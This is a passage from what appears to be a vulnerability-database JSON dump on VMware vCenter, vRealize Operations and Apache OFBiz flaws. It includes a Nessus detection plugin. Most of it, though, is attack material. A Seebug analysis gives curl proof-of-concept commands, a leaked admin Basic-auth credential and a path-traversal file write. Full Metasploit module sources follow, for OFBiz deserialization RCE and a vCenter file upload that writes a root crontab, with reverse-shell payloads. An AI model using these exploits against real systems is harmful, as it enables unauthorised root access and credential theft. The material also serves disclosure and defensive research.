\"CVE-2021-22006\",\n \"CVE-2021-22007\",\n \"CVE-2021-22008\",\n \"CVE-2021-22009\",\n \"CVE-2021-22010\",\n \"CVE-2021-22011\",\n \"CVE-2021-22014\",\n \"CVE-2021-22015\",\n \"CVE-2021-22016\",\n 
\"CVE-2021-22017\",\n \"CVE-2021-22019\",\n \"CVE-2021-22020\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0434\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/01/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0045\");\n\n script_name(english:\"VMware vCenter Server < 6.7 Multiple Vulnerabilities (VMSA-2021-0020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.7 prior to 6.7 U3o. It is, therefore, affected \nby multiple vulnerabilities:\n\n - A privilege escalation vulnerability exists in vCenter Server due to the way it handles session tokens. \n An authenticated, local attacker can exploit this to gain unauthorized access to the system. \n (CVE-2021-21991, CVE-2021-22015)\n\n - A reverse proxy bypass vulnerability exists in vCenter Server due to the way the endpoints handle the URI. \n An unauthenticated, remote attacker can exploit this to gain unauthorized access to restricted endpoints.\n (CVE-2021-22006) \n\n - An rhttproxy bypass vulnerability exists in vCenter Server due to improper implementation of URI\n normalization. An unauthenticated, remote attacker can exploit this to gain access to internal\n endpoints. (CVE-2021-22017)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. 
Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.7 U3o or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22014\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22005\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Analytics (CEIP) Service File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\nvar fixes = make_array(\n '6.7', '18485166' # 6.7 U3o\n);\n\nvar port = get_kb_item_or_exit('Host/VMware/vCenter');\nvar version = get_kb_item_or_exit('Host/VMware/version');\nvar release = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nvar build = ereg_replace(pattern:\"^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$\", string:release, replace:\"\\1\");\nif (build !~ \"^[0-9]+$\") audit(AUDIT_UNKNOWN_BUILD, 'VMware vCenter 6.7');\n\nvar match = pregmatch(pattern:\"^VMware vCenter ([0-9]+\\.[0-9]+).*$\", string:version);\nif (isnull(match)) audit(AUDIT_OS_NOT, 'VMware vCenter 6.7');\n\nvar ver = match[1];\nif (ver !~ \"^6\\.7$\") audit(AUDIT_OS_NOT, 'VMware vCenter 6.7');\n\nvar fixed_build = int(fixes[ver]);\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nrelease = release - 'VMware vCenter Server ';\nif (build >= fixed_build)\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nvar report = '\\n VMware vCenter version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2021-07-24T16:02:59", "description": "", "cvss3": {}, "published": "2021-03-22T00:00:00", "type": "seebug", "title": "Apache OFBiz RCE\u6f0f\u6d1e\uff08CVE-2021-26295\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2021-03-22T00:00:00", "id": "SSV:99163", "href": "https://www.seebug.org/vuldb/ssvid-99163", "sourceData": "", "sourceHref": "", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, 
leading to a partially controlled SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. 
Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, 
x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw 
new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 
[ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF and File Read Vulnerabilities (CVE-2021-21975 CVE-2021-21983)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-06T14:43:30", "description": "", "cvss3": {}, "published": "2021-04-06T00:00:00", "type": 
"packetstorm", "title": "Apache OFBiz SOAP Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-06T00:00:00", "id": "PACKETSTORM:162104", "href": "https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::JavaDeserialization \n \nXML_NS = { \n'serResponse' => 'http://ofbiz.apache.org/service/', \n'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/' \n}.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache OFBiz SOAP Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in Apache \nOFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for \nversions prior to 17.12.06. 
\n}, \n'Author' => [ \n'yumusb', # original PoC \n'Spencer McIntyre', # metasploit module \n'wvu' # metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-26295' ], \n[ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ], \n[ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ] \n], \n'DisclosureDate' => '2021-03-22', # NVD publish date \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :curl, \n'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \n# Send an empty serialized object \nres = send_request_soap('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nmessages = {} \nres.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry| \nkey = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s \nmessages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s \nend \n \nif messages['errorMessage']&.start_with?('Problem deserializing object from byte array') \nreturn CheckCode::Vulnerable('Target can deserialize arbitrary data.') \nend \n 
\nCheckCode::Safe('Target cannot deserialize arbitrary data.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_soap( \n# framework/webapp/lib/rome-0.9.jar \ngenerate_java_deserialization_for_command('ROME', 'bash', cmd) \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef send_request_soap(data) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'), \n'ctype' => 'text/xml', \n'data' => <<~XML \n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header/> \n<soapenv:Body> \n<ser> \n<map-HashMap> \n<map-Entry> \n<map-Key> \n<cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj> \n</map-Key> \n<map-Value> \n<std-String value=\"http://#{Faker::Internet.domain_name}\"/> \n</map-Value> \n</map-Entry> \n</map-HashMap> \n</ser> \n</soapenv:Body> \n</soapenv:Envelope> \nXML \n) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162104/apache_ofbiz_deserialization_soap.rb.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": {}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module 
requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. \n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, 
\n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) \nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html 
\n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}, {"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. 
